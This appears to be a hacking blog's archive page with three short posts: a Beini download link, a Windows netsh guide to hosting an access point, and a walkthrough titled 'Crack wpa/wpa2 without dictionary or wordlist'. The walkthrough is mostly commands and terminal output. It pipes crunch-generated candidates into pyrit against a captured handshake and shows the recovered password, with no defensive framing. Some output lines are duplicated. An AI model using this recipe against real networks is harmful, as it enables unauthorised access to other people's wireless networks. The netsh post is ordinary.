Sunday, 2 September 2012
Beini download link version 1.2.1-3
Posted at
Sunday, September 02, 2012
Friday, 18 November 2011
Crack wpa/wpa2 without dictionary or wordlist
Posted at
Friday, November 18, 2011
Install this first:
root@ubuntu:~# apt-get install subversion python-dev libssl-dev zlib1g-dev
root@ubuntu:~# apt-get install subversion python-dev libssl-dev zlib1g-dev
- crunch - http://sourceforge.net/projects/crunch-wordlist/
- pyrit - http://code.google.com/p/pyrit/downloads/list
ESSID = "test" and passwd = "biscotte"
command: crunch 8 8 abcdefghijklmnopqrstuvwxyz -t bisco@@@ | pyrit -r wpa.cap -e test -i - attack_passthrough
Terminal
root@ubuntu:~# crunch 8 8 abcdefghijklmnopqrstuvwxyz -t bisco@@@ | pyrit -r wpa.cap -e test -i - attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'wpa.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:0d:93:eb:b0:8c automatically...
Tried 17578 PMKs so far; 434 PMKs per second.
The password is 'biscotte'.
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'wpa.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:0d:93:eb:b0:8c automatically...
Tried 17578 PMKs so far; 434 PMKs per second.
The password is 'biscotte'.
Thursday, 20 October 2011
Create your own wireless access point
Posted at
Thursday, October 20, 2011
How to create wireless access point by using the cmd command
- Start-> Search programs and files type "cmd" right click then Run as administrator
- type netsh enter, wlan enter.
- set hostednetwork mode=allow ssid="Access Point Name" key=passphrase
- Command to start and stop hostednetwork "start hostednetwork" and to stop "stop hostednetwork"
Subscribe to:
Posts
(
Atom
)